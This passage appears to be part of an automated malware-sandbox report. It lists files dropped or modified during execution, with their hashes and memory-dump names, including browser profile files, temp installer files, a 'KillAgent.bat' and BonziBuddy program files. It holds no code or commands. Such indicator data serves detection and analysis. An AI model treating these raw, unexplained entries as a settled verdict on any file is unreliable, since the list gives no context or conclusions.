| SHA256 | 20e5a282878920ebed33a40ddae5b7c0119fc0d0db7e2b669cb0bc76e2e10079 |
| SHA512 | 9233699037e7de47cf593e2b296af6ace1756de783c008d9e4f5cc5131b10ee6621f1d300149108d1688e1d269903ab37ab468dd6d17dd856b40d126b2c5d609 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 2ebf19bb66b8fed9a94a80777b273bce |
| SHA1 | 8b639ce6bfe4d6b1e4491bbb8106568470bf0535 |
| SHA256 | ff5bf67c0bb10a0f7e62b01c1692a6379f47ef2ce0f7b1efa3118a5b94774344 |
| SHA512 | 28c151048b4823162a4429dcf0d475e11e8a32da37375ff64d13dc5d9d716ece8a27f243af43f791b0bc855f8240b74264f64a4ee0c7878f5153c680d907d1bb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a510831bce5930f88a3d9642fdbd920a |
| SHA1 | f2f8652ee0623eb9df27b2c198b031f1deccd9dc |
| SHA256 | fe6be895eeef962a926edca42cbbd867126088ef2b8004d99c268590848dc0f4 |
| SHA512 | c5589ae76e68be527c5d01d3acbcc47b9b45407da89974d546ba474e09e52e2a95806790dcaf7817c2551868c0d6b1e2e14b5098b0f4c18e4d13a0a673df3516 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133633473114506056.txt
| MD5 | d658e5c93f4253d2a21ecb7fa8905ca7 |
| SHA1 | d92b183928627206927c1c7893a15e16a00bab39 |
| SHA256 | f9896336b72595418786f29beb28d71983102ffbdd6c7f1e360c37ee2b7e323b |
| SHA512 | f0fda9bc085d59440a319cf16997073b4292ce63694e00f59c6139a06680c41350c22bf7429b30d7567c3d7fba60083c7290ab7a02013859313a9a836628954f |
memory/4580-3170-0x0000024083380000-0x0000024083480000-memory.dmp
memory/4580-3197-0x00000240A5B70000-0x00000240A5C70000-memory.dmp
memory/4580-3199-0x00000240A65E0000-0x00000240A6600000-memory.dmp
memory/4580-3217-0x00000240A6970000-0x00000240A6A70000-memory.dmp
memory/4580-3243-0x00000240A5D60000-0x00000240A5D80000-memory.dmp
memory/4580-3244-0x00000240A68F0000-0x00000240A6910000-memory.dmp
memory/4580-3246-0x00000240A6870000-0x00000240A6890000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\H3PMCBH8\www.bing[1].xml
| MD5 | efe1db47fdb021966534957d7907ae62 |
| SHA1 | ea57a09602c83d4e109699771378ce58dc509700 |
| SHA256 | 3e206dd4e18e871b6349c3458c039b9eed71a482074ea9dc8515d5b5dd26b64f |
| SHA512 | 6986cfeaf34efc1eeeea86526ebdc0f456b5dba830c7bd31a9f23104897925674805a525c172f5f727752271b587c2ec15312a96dcfd761db134db9608f9b70d |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\H3PMCBH8\www.bing[1].xml
| MD5 | b1bf01220c8ef779dcc76368196e4494 |
| SHA1 | ed3ca1ff5650c6601cb95750627c9cc74764c7f9 |
| SHA256 | 1ba3db3f71d05da72238502a9e80c98fb64c42361cf94d375c3e89342e286e83 |
| SHA512 | 9593b75b676366a1b484476653e384cc425b4fca5114ce83c1d11cbf53021aba1bbc6db66f3ead2eaf0f5b97435d3397cd288266554ea366560524668c9e2fb1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b98d7509b9fc02f715cd0b945f4b4951 |
| SHA1 | 4fb1049888237f9f726ced82612a5c6927b1ede1 |
| SHA256 | 96358b76d8cdb446bed36f695e3876f866ddc1a48ba9e30f700aaa0cde411ce9 |
| SHA512 | 23c8694a9dab1d567c6f6d348b7bdefa1c7388a7cac117463051591fdb9d1115b876f2f6f27121ff3834a1838623d65c1bd7d2c55b97c82889837cbfc97c8b2d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 380168cb61993058a848e1b40b32535c |
| SHA1 | 1de47f45b01f185cd0637bea24173da9fee6648e |
| SHA256 | 2cd30d747e7034482b8fbb59d398dfe03537d12bbfd3edcc351a50952f358dab |
| SHA512 | f3398e26a913d57f7f458376acc6e11dfffef1e4a4dfce16d683c31dbb3e7c39053bffc4de91732be55070a9cbc6ebdcbd8d1f2cc96b663f77b9c14a431e8936 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 32efd53dabd5774a03ae8fe52efb2921 |
| SHA1 | 6dd5766a8dc48f35a9e1c07ee1804d0701295e49 |
| SHA256 | 71d8b0cecc419fb10b614d485408dc92387f1949421cdf335d3b030535ffaa80 |
| SHA512 | 9d4f2ba322721a665a609e8c1ed7cbdfa30124aa2e1b3091006d286248a6283595fa6d1669e462faf9cd7f6601a6025a24fb828c55cf4b94c9e3da6ba9818fb2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | 077e65a9e6f3934de6ee7ada3be68af7 |
| SHA1 | b7fc0a983e6300b31380792d9bee102ae443e7ee |
| SHA256 | f48536d6922fa98382fe53e4aa7669fe66cda3487da21089a785aeb1ebfa14ce |
| SHA512 | 294a858f96f71d3b52c62ccfb06d00eb49a721f711dfaac527c0cf118a54c5df4e511f8a21e8a58c1c9a977cf409baf61b11724c830c4660ecea70d9088685f4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\715091bd-bc06-42a5-8c4b-dc209678db6e.tmp
| MD5 | 4ec5a7a49e12e9ac9f9756c68630d53c |
| SHA1 | 4d12b6fcf433b64cf617f8df04482adfd6254147 |
| SHA256 | 4eea99a82ac79755e7d5ea18be8507a08b2bdf5357927399fada6a1d48b7753c |
| SHA512 | 1de3c14ba5d7a2113e612f186f0acb9c8b27bc3de090f4c72221e0b14114b6a73e658155dae7a7c1d027e621d0b3cb946a83d7b4d63927136e5819ae33441395 |
memory/4580-3601-0x00000240ABCE0000-0x00000240ABDE0000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\H3PMCBH8\www.bing[1].xml
| MD5 | 2daa91b0110f19dcca465c53fcb48339 |
| SHA1 | 5aceb52952a2694dca2fc9f6d08009a74ac9e1ef |
| SHA256 | 06c7cbe601bc975c99f44dec20bad49d6675e02bcd8889fefd047888ca3afbd9 |
| SHA512 | a024caeda02bd4d85646937161e2a75fe9d035c6cb42d786a21dc5455051627a0b9aa66cde8db424a813508e415b7ae9010a385d96e6a5008133ce91089ffba5 |
memory/4580-3930-0x00000240AFEC0000-0x00000240AFFC0000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\H3PMCBH8\www.bing[1].xml
| MD5 | 864f97bb37cb7b0cd37c242a4a0a5068 |
| SHA1 | bbdfa779df3466023fc0397579797301aacecfe5 |
| SHA256 | 81c05fa08820dd9251c91bd3f0eff96aa76cee130dbc3b9a56035a6335aa8fe7 |
| SHA512 | 260f89eb751715e67d142a26fb69d425f8a37520093a646b1a59ca4025d5f2fdb9bcfc5fee28d81d5b7466ca41316115ded0a817073c99970f584ccc8b59d694 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\H3PMCBH8\www.bing[1].xml
| MD5 | daf7d058af68b2fd79f0448cb35995ad |
| SHA1 | dbd7da67bd674566fe73b739bc5a3c81c203e764 |
| SHA256 | 1e100a3479903647a2f10a7d512a975c8c326e0b6e58e2d47f14266cd2997483 |
| SHA512 | d27ac219b580492b7b421e7fc147b1e510d294c7edd1a4cced5d329cd246c2048b58e5aa10e586c9172cb5636c81f438a1afef38c7712fc8ff175a74221ca9a8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8a20796f670d2ed63167884afb9ba552 |
| SHA1 | 2c6896c6de1706127f97b41a05002ffcda6e657f |
| SHA256 | 95dbeb633b42bfca33b81e3bd0a3d02a81e9eb99e1b07fd60c3dc632df12c132 |
| SHA512 | ec40d16fd9a69d774a6279edf62489cb423525bf466457740ed0838c946941ef3323014b2aa07d915ab609a37952859007a0cfba372fa4ad878d82cc8f21b9d1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | d2430cf75920a51d446526c23b2170d3 |
| SHA1 | 03b27eb20a81443e0a74db132c2719f0a6935c6c |
| SHA256 | 9cdfd81d5072d7ba6c738f8bbc5fb6eebfe4e831b5b76412bbcdaffd8d2cbfcc |
| SHA512 | 0c1e24c6001c3220f1fcee73fb7a38af3b7df72979522f578add1f4d86190b6785aacdf0fe414d63fd78c98d077eda383870e54f6de16f0f459b3a2300a6c6ab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e
| MD5 | 99916ce0720ed460e59d3fbd24d55be2 |
| SHA1 | d6bb9106eb65e3b84bfe03d872c931fb27f5a3db |
| SHA256 | 07118bf4bbc3ba87d75cbc11ddf427219a14d518436d7f3886d75301f897edaf |
| SHA512 | 8d3d52e57806d1850b57bffee12c1a8d9e1a1edcf871b2395df5c889991a183a8d652a0636d5452068f5ef78d37e08ce10b2b2f4e05c3e3c0f2f2230310418a8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 01eb3e95ce87a5e77a79bb54cc6de89e |
| SHA1 | 3d27f66ae2c0f7d911d63dfa1d648e0f0a905888 |
| SHA256 | 25222adf24271a1e874b847cb26dcdc788187cfc2fef63db4893e73920d8dc7f |
| SHA512 | 90a2b65a647e68cee63ef549e3c3f3d0c4180bfda1857256ffc4bffe2a89677fc47bcdc01917ac82bee60039ef31d870c6205bb6199f8268ef713a91f8e96186 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6eb228b5e04a5c180a1a539adfee41ec |
| SHA1 | 6236c969338bd0dcc8583d7912683b4f355f0407 |
| SHA256 | a544d6c6d908416ca4f6f083ca053744d817d7bbe42af432d39a614eaf0d3bda |
| SHA512 | 84af0b15fdf64f995ca224d57330c833416993ecef360c27affeeaadf4c2beb7dd9412254fa56c3bd6174cf166fb466e42453fbe1c2987589cd5b383cebeedf3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 9ea5a33780be45fd6e085fc8f555a844 |
| SHA1 | a81bce37467992b15b0359a59ec4ca6416803a46 |
| SHA256 | dc7b13901f18af32693fde2aed7a2abcf8b45ce2749e4861b383258e92c598ad |
| SHA512 | a1435a3e72ede84701a7c618a4cd487f621edd71591e33cfc5d38ef5ec9aa9e5eefe11647cf1edaa2d55518e7f5f3d1eb3c4ae77b7e4c10da79076cba525ce0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5cc972.TMP
| MD5 | 2e1a7d2bb408c9631fe095cb69f18c3f |
| SHA1 | f7d16a4446169563c48c1aa4bbed598661fac86c |
| SHA256 | 8f4d42599632b175c25b1fd913243c7b402bf0e7a76b3101088655fe10a8b086 |
| SHA512 | 219c60d14df1c80ab19995ff2e7cbbea7a323383c47c69122dcb4392f83628d973528e5f2e34eec9f922015d61cf727c2294dc6fe207417813ae15b8b0aecd29 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 5f438710b7bf9189628f317945b08264 |
| SHA1 | f081aa22ea12affc5ecda777e1de1d0d9b2a3b7a |
| SHA256 | 1b0f863d493eaa45118ae55f802f60782052a8f3490155207988ac0039c17cf0 |
| SHA512 | 3820524e2f8ff8701497806231f80a4739b2e6c609a0ebe390b74bce4bd6dd556bea4fac05266f61961bec4ae3a8f0b4f7a601aeb1c7278188cdcd5b3f187a81 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 6a9b4593b808b4a0eb90dd4095d557f1 |
| SHA1 | 97779acdd0a8c0e1bc3e135e805b6918937b331d |
| SHA256 | 46aa703619f99affd4bae73b84cb6e84004e83042557a4add10d9fb72abd361a |
| SHA512 | 28fdd6f70c7969ba1b35626deb2c7e9d39fabac601fb26ce02d57e89d326fdddf2619b627c7edeb2d6856f79cb78261e41e307f0d116ad0599f2a76c2bd76606 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5d5650.TMP
| MD5 | 722f3aa76718891f385daf6ca88e407b |
| SHA1 | 2da2939d11a588d791c5a7e4dac612ac9c6df424 |
| SHA256 | 8939b11d82f408f9bc5406899343af7a31682c4da290009641fe4ed824c36417 |
| SHA512 | 7341e50ab3fd403ca63bb22ce8f5e302657ed062d2b9eb0f9a7f28af351f3fe0db607cde4e9c6a928382f4b10d62599a176618309b9ffde893cd394de14c0996 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 2d9020791837acd8531e02eca667f637 |
| SHA1 | 88f7d45b23cd8cd061dd69001b0339289df64138 |
| SHA256 | 9c9ae38de4725a7c657e3e6cece16af2d3852c3a62b2c7e91f3fef2f1e4c2e4d |
| SHA512 | 555ac411f215215512277b68ad44a0f3db8193c30b1c7a20e84dd9ef0e747a86ed45c262fe6b616cce503effb0fe78d24f46a8d756bbea4ed854cf6fca71ef96 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | cd47a7a019c7fa08268701b84e1a9cfe |
| SHA1 | 200bfea5a98a9f2b095cc643bf099f9fa42e7758 |
| SHA256 | 1bdb2db2eb27a426ff1b4d8355121b82a356e435c6e3ba006b4b26a29ac4884a |
| SHA512 | 69e28c69865b74b7cf405db9031272b9ea1927dc6d25c4c88e3eaae1d8b9ed840b59f28128008fc42be3d8bf062786e47df8d816fd763c5b2b9a9f6913e3bf1d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 6b036049ff0108814491dd164e8741c5 |
| SHA1 | 89ed431a75082c9af528b0b277c6718c15a799ce |
| SHA256 | e1c913b09da19559b033369453a8060fdbbb35bd7940a82de34148793358d264 |
| SHA512 | 97e173a1316ab621e12ef3fcbe4beec97c817c07d792f222bcfd49551e45fe65d6f299e10e82392ab98e1f28ac24a64c5ff64750205dd772a9e16063178093a1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | 7006faeac86727affa848e4638131e6f |
| SHA1 | 6e7f17bbf55cb977857735db38f27a5b04d0e9b3 |
| SHA256 | f53acb2764b1bbcda5e5111184956e7cc798f1f69f26cf34d5b643559b7f59c3 |
| SHA512 | 30d4558a50738efa67c1a8dbb23a762b62aef90d5bb40976ba8bc25ad36282caf727990a23f3679cef2f07cd21d20b503e5ac9617556495c186d21e0c6ec5afe |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 057070ecab164070265569f4608d23f3 |
| SHA1 | ffd5957c89e9db65311f1bbba695845b5ff02890 |
| SHA256 | 4f2ab35e5e5bf513223b512e4631a66d2d3a9d436f5b66e8f7d16a7b06720b02 |
| SHA512 | d14a058e84a1bd1f34086c89463eba5942b7df79a007d48e40ef77e407b13599173399c3ad075be0918a2426b6c715a57150a5a73ed3d6e8e63e51e6b891effc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 16cbc52451f734408108c4ad22a28b86 |
| SHA1 | 1d7c9862a84df49d78a92f6da3ee234115488507 |
| SHA256 | 1c3a4d9fbfc5a9da5bb695aed92a3e9de059492c18fad855256df88af8706bfc |
| SHA512 | baa8729db178d4bb8d349dc91f8a205069d84f427eb4b5499e6bd3077c9b7f53dc3770ac82c3e034dec6ee4ede4eee89884cf1b2508711dff647aa15323d76e3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 9293f010ba43a7c08d25b0f20fca2812 |
| SHA1 | d7249bfc92ff3d20581630815cff807cf67d68bd |
| SHA256 | a447ca5e04dc5cea8482fc5582a125713838a4a6527f5f4395b945d144568101 |
| SHA512 | a607e466d34e80e2123fc34cdf56acb7e85f93cdd3819af4cdcd3fb101518a648e47a1cac4ca99ec121d86ef3d9ea8613709f588a73c510aa4d90a75efa8a6d8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | eb2c642393f07af6dab9d54374e60eff |
| SHA1 | 6c3c816f5c1e625d026d5bf2d994d7e0d4d4f9f8 |
| SHA256 | 8c302c2d6c47cb43b00141fc392f8fbdda310a3f94cc216ec8ba538ddef6917b |
| SHA512 | e12416cc08cd9809cd3211a1a20f3ab437b8b3763f974f62b41a62e7550373a7a7e78d33d5266b700bf0ae8c7479e789a7db6a7ee28c32106cc3032017d8a3c2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008
| MD5 | 748f143f9412c4b4f40b2fbe2f6922ec |
| SHA1 | 0fb9c1ea3fec9acb2fe0fde54524668f70643231 |
| SHA256 | 4dfcdf7bb12d6a7c91d7f3367e5611b30a90d661e3c5c04bbdcc2c60005706ec |
| SHA512 | 8696a1dec04563a939a5fa9d7a67026c32272d27a7758f05eeb95cd39a0fd0d129b69d5984400954b230c09335d84fe4a1b6e53477e16144b6648cd01ae7514b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a
| MD5 | 635efe262aec3acfb8be08b7baf97a3d |
| SHA1 | 232b8fe0965aea5c65605b78c3ba286cefb2f43f |
| SHA256 | 8a4492d1d9ca694d384d89fa61cf1df2b04583c64762783313029ae405cbfa06 |
| SHA512 | d4b21b43b67697f1c391147691d8229d429082c389411167386f5c94e3a798f26c2457adf6d06caec446106e0f0aa16d895bfc4e8a1ff9e9c21a51173a923e3d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007
| MD5 | 5d0e354e98734f75eee79829eb7b9039 |
| SHA1 | 86ffc126d8b7473568a4bb04d49021959a892b3a |
| SHA256 | 1cf8ae1c13406a2b4fc81dae6e30f6ea6a8a72566222d2ffe9e85b7e3676b97e |
| SHA512 | 4475f576a2cdaac1ebdec9e0a94f3098e2bc84b9a2a1da004c67e73597dd61acfbb88c94d0d39a655732c77565b7cc06880c78a97307cb3aac5abf16dd14ec79 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006
| MD5 | 76c36bd1ed44a95060d82ad323bf12e0 |
| SHA1 | 3d85f59ab9796a32a3f313960b1668af2d9530de |
| SHA256 | 5d0e5d5fdb4d16cf9341f981b6e4a030f35d4766ad945c27381f8d3afb624542 |
| SHA512 | 9f0555fb531734b786364701e17cb7f57ce94a688d4616fb85bf32cad45a253a9c479a301e05a4f8630cfea141dd52726a31b8e90198c19c16f33fb150a04a40 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b
| MD5 | 2923c306256864061a11e426841fc44a |
| SHA1 | d9bb657845d502acd69a15a66f9e667ce9b68351 |
| SHA256 | 5bc3f12e012e1a39ac69afba923768b758089461ccea0b8391f682d91c0ed2fa |
| SHA512 | f2614f699ac296ee1f81e32955c97d2c13177714dbd424e7f5f7de0d8869dd799d13c64929386ac9c942325456d26c4876a09341d17d7c9af4f80695d259cfea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c
| MD5 | 77e89b1c954303a8aa65ae10e18c1b51 |
| SHA1 | e2b15a0d930dcc11f0b38c95b1e68d1ca8334d73 |
| SHA256 | 069a7cc0309c5d6fc99259d5d5a8e41926996bbae11dc8631a7303a0c2d8c953 |
| SHA512 | 5780d3532af970f3942eecf731a43f04b0d2bdb9c0f1a262dbd1c3980bcc82fe6d2126236ad33c48ea5434d376de2214d84a9a2ccec46a0671886fe0aa5e5597 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d
| MD5 | e5622114d3b8e67d1a75e35f8c9e0414 |
| SHA1 | c02c68a3df90ff2c81fb46989bb2236f8a1d275a |
| SHA256 | f8935be61874372cd0cfbd7536c87f6caaf3cf6de95bd148f28d19102d3a2e81 |
| SHA512 | ccc2722db5ed5fc0111f52b802327fb1ad20bb4123ead20248041b116a913b6e900e24ef326e352f776cca1dba9322e85c98feefe39b0da19478f0041091907a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 87dfb919bcccfa4db1b999bd524de71f |
| SHA1 | c440164fc5e34047c69813c049c65bc9c0e30466 |
| SHA256 | e6228de6af4adf3a84e469f45ea683852b160b47cfe18219bd35185fc013715e |
| SHA512 | ba68a697f26da9b26e427bd3d394523dea369aa95cbb8b9b8c37d19ab119943b3dbe5474b1c5ff152169fd2845b1849212e9aed918b12704f2738ce4c5327e71 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3ed74fdb3e48ba044fde00b8ec0cbdf8 |
| SHA1 | 6cc5428d8c40220670af61ec228cdca8258bb788 |
| SHA256 | 928aea6b8405c0328812b77c61921388bf6d9346d8c8312a679d02858bf47fac |
| SHA512 | 0f7e3876cd977e8ea198a16ee72606aaf4347aba1f517a0d039d57cfa043c1fec4188ae4515ba7f36cd94f9f313a857a87a0d0310614a478e2b4f15ef758e574 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 2d271c5ed47bfd675127a3cc1823a4d9 |
| SHA1 | 92fe7b33dc69ad03ae1e9e5c090f287d1a795c37 |
| SHA256 | 84ecbb1aeaaf350598190faa9205e988813dfc59f397fee3ce2591a304009697 |
| SHA512 | e6a8eba136729e83939b4edb2911ed729b0e51502c91f2900131f0cff916867881afb50d11e9d8e6616566c13d37492cb8a9380e12ae2a95b023d999118d8c78 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 42fb2d6cb5a3e11283f6a65d874fcc0d |
| SHA1 | 5858b68b1e05927c1212c3f0a707fdebb7217cf9 |
| SHA256 | 9580cc2fecebd45da7d1ed4dc49c28a5172f66a5716e94da31b5dbf27f8eb1d2 |
| SHA512 | 5fc460af9a34accc790c34c8460b75571493a0c74bc540568b8714e2031d821b35b507e60b02f584d71932de5c7fa5a757f9e79f7c42871a9172ab2d855b0387 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6c7547171cb92a912e87796f3d47b8c1 |
| SHA1 | 4bea86da4184bb8f57410312186dbe9d269911f2 |
| SHA256 | de095791f62a8feafd0384b2b890c5f73f3ece5bd75ece2b1f65871978eb6ebb |
| SHA512 | 1395ff8be56db34302d0b6dd14b12c519825bacd38dab37b01ae04fb1a8f9562b22b22e488ba58dac422d4dd2c5eccce28f2cf576c07fb65dccabc75c31188ee |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 0f535a666136b4d7adbbbdb88ed4de3d |
| SHA1 | 5ba640a77db1866a9e09d584c62a648d5ce080a2 |
| SHA256 | 4ffd10e91fba139aa84060d0f4863e5a2aa81fe0ab2a40b1b49f59c992cf3e92 |
| SHA512 | cbf601c7d28fcb8bb7223267cc8c529b078628505ecaf2845ed08bb8ff3e6c3d408d02d1fc862fcbc0cf23293239e4d9c685dda5851a0179a2ecf5d6d3fb0b0e |
C:\Users\Admin\Downloads\locales\bg.pak
| MD5 | 7c321056f805aabd5a503821fa1994cd |
| SHA1 | 9c690875c9189c66c93ebd4c0971739653bccd19 |
| SHA256 | 261e6aad3ad0a5f608b5694919ee39026c4c3eb4256540068f7c1aa46be9315a |
| SHA512 | 8a5f4b3726e4513251475ac470f86f0daa0d5ae42bb750019ce96ed871cb04a7391cea2cef79e67c585e3a982041575e60d0f79b3a5bb9ad09be53362787f090 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\AGTEULA.TXT
| MD5 | 7070b77ed401307d2e9a0f8eaaaa543b |
| SHA1 | 975d161ded55a339f6d0156647806d817069124d |
| SHA256 | 225d227abbd45bf54d01dfc9fa6e54208bf5ae452a32cc75b15d86456a669712 |
| SHA512 | 1c2257c9f99cf7f794b30c87ed42e84a23418a74bd86d12795b5175439706417200b0e09e8214c6670ecd22bcbe615fcaa23a218f4ca822f3715116324ad8552 |
memory/3732-5514-0x00000000769A0000-0x0000000076A1C000-memory.dmp
memory/3108-5564-0x00000000769A0000-0x0000000076A1C000-memory.dmp
memory/4540-5614-0x00000000769A0000-0x0000000076A1C000-memory.dmp
memory/5840-5664-0x00000000769A0000-0x0000000076A1C000-memory.dmp
C:\Windows\Temp\OLDE6EF.tmp
| MD5 | f6cb9878bee0cc17e54510ab92d79286 |
| SHA1 | 1b71ef7f8f5aa4e05d049c42da2fcd28a68f6761 |
| SHA256 | b9b5c73ac5b705ec8c0ca807ab16ccb0ddeb986ee734fd6fff7b5d33a0c04412 |
| SHA512 | baa7c2b2d2bf1faeea3202fc2108c484c003034998beab07ee6102fc53b8efb1f19773ed45e57b6c118603d6874bb028b834eefb8e098577613d0947ca9855f2 |
C:\Users\Admin\AppData\Local\Temp\KillAgent.bat
| MD5 | ea7df060b402326b4305241f21f39736 |
| SHA1 | 7d58fb4c58e0edb2ddceef4d21581ff9d512fdc2 |
| SHA256 | e4edc2cb6317ab19ee1a6327993e9332af35cfbebaff2ac7c3f71d43cfcbe793 |
| SHA512 | 3147615add5608d0dce7a8b6efbfb19263c51a2e495df72abb67c6db34f5995a27fde55b5af78bbd5a6468b4065942cad4a4d3cb28ab932aad9b0f835aafe4d0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 74bb19796a9c8349977863313f38de31 |
| SHA1 | 16735b784b7d17de95b8c843126ffca546c05059 |
| SHA256 | 8540f205f55dd19d6f91fe067d5cec643dcace648f3b9dc1e92b838ba53fbeab |
| SHA512 | 4484fba226aa396e0de750a536309427d0d9e0bbdf50902fd41b1c91ca488631638764595a6a1ce8251bb5dcc0c9863cdf184b9e59b2357bbb7c18991b2c4837 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 864e6adad1befd77c455a8625243339a |
| SHA1 | 1bc6020693ef9396c745b08cfb80d534bb9433cb |
| SHA256 | bc7eb8c3a63291621b7cf06edaf4d811c57b2c74e243664a67ab608fcaf60f85 |
| SHA512 | 112a5303b03945f4896520d5942481e3a03cd99f1f176bfaebb6a28bcef532f11eab9e4119e6183e632f1a9a91a3c1556d374c7c3325e045b8958e73b9146b28 |
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp
| MD5 | 4b332a1b235922a7870595abef346cb6 |
| SHA1 | a0a9a95768942641c0622ddf2e29624c5fecb4bb |
| SHA256 | 4690ea1b97998f45a2bd991085dfb08177dd074bec58a9e07b61e3ed721bedce |
| SHA512 | 714447bd0441587dd0c17d0af0478aea575a419a20cba07508e03785f17d7a6f46dda686f9e9462125639039b9ce526538387e8822e2705a473ae45e85f3452d |
C:\Users\Admin\AppData\Local\Temp\$inst\16.tmp
| MD5 | 38851b1e45d75c5a7489188440c23ba8 |
| SHA1 | ef57d1afdce578cbcf6c79e613c805e24a840285 |
| SHA256 | f783ade814f65f9e750acbb0bd27312cbfc86d699edfa2c77773c67094c11fc8 |
| SHA512 | 88dc0680c9dc7b01c61ee7687fdfe95fbfcda6fb24c53ec643b5e0bfb3d8af9cf5dae098b6fcd22d3a92ce7b12a3f32862ad521b42e407de5be056dfea62135f |
C:\Users\Admin\AppData\Local\Temp\$inst\7.tmp
| MD5 | 420aee57b5e083d256d28e45ef887adb |
| SHA1 | 39f58e11b68f13932217b98672c4f33adc353be8 |
| SHA256 | 1efb1a8831f68b443a3e3a06599e914162dc1a9b1b8f9ebc8020b40b72bbfb80 |
| SHA512 | 76ae5dbb4aa3baf1df3e5684855ece03cd7693698b993a40da579c78c4cf9ba3dc4baaf699933d4bf56eca12ea2847b02f997d5d8ab8e5f267d5f4d6634a52cc |
C:\Program Files (x86)\BonziBuddy432\AUTPRX32.DLL
| MD5 | 6e62806f4121eed119ef7d361f3322ca |
| SHA1 | 2265e83e068fd0bda58d0ed8366050614138787e |
| SHA256 | 0563e77b6bd63eb0561f6264badb5d07dacb7287ce029dc3ca3279a964ea6a6d |
| SHA512 | fa5efb12fcd7d34a026b95a573c5a8b72dcacfa0c3df439e55691f27c9c0d8cd8905f0d3cad610259b9bdac474a3ed41796a91474e0ab522e78d8a2cf2a53dba |
C:\Program Files (x86)\BonziBuddy432\BonziBDY.vbw
| MD5 | b4d876161a7abb7bcaea37003dae158f |
| SHA1 | 5317af4e389e00103faf2ec0a1acfa2b59b30843 |
| SHA256 | 4dd98f95113b70772308a4671a482b9b59bba5fbf41e928f2a833366c54424e4 |
| SHA512 | 3d5da08c1c39cb4ea24b66612a383e166500dbd891113f080c66ded8a29bf8e4094c6e407fc24f873d598e13daac8c06d91ba488f9d4ca10eecbc1f51f649767 |
C:\Program Files (x86)\BonziBuddy432\BBReader.EXE
| MD5 | eea3608cb27995431165a2caaafb00a6 |
| SHA1 | 45b73c03bd68be6b39d7e3737c4853db2998f3e0 |
